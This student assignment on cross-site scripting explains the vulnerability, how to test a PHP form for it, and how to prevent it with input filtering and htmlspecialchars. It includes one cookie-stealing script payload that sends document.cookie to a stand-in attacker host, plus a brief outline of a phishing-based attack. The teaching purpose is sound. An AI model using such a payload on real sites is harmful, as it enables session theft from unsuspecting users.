My Opinion of XSS/CSS, Digital Forensic, and Digital Crime Investigation when I was a Young Student
--
Note
This is the fourteenth assignment from my Masters Advanced Network Security Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here.
1. XSS/CSS
XSS/CSS stands for cross site scripting which is a computer security vulnerability to inject scripts into web pages viewed by other users [1]. What is the difference between code injection? Code injection is a server side vulnerability while XSS is a client side vulnerability, what they have in common is they are injection type attack [2]. One of the easiest method to check for XSS vulnerability is to include a html tags into the submission form, for example on Figure 1 is an <S> (strike-through) html tag inserted on a simple php form input (any php tutorial on the web have this tutorial) and Figure 2 is an example of using <img src=””> tag to add an image, even worse we can input tags that could display the attacker site instead and take the victim site with <script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>. (1) Once a XSS vulnerability had been found we can send a phising email to the user of the site containing the XSS script. (2) With a good social engineering the user site can be tricked in running the code and connect to attacker's site through the vulnerable XSS site. (3) The attacker can obtain the session ID and other informations of the victim. [3]
Figure 1. Checking XSS vulnerability strike through HTML tag example.
To prevent XSS we have to filter the user input. One way is to not allow html tags for, or perform sensitization allowing text formatting tag such as <B> <U> <I> <S>, and converting dangerous tags like “&→&”, “<→<”, “>→>”, “”→"”, “'→&x27”, and “/→&x2f”. For my above PHP code I can fix it by changing the output function (adding) into “echo htmlspecialchars($string, ENT_QUOTES, 'UTF-8')”. There are libraries available for filtering XSS if it's difficult to make our own libraries such as “PHP AntiXSS”…
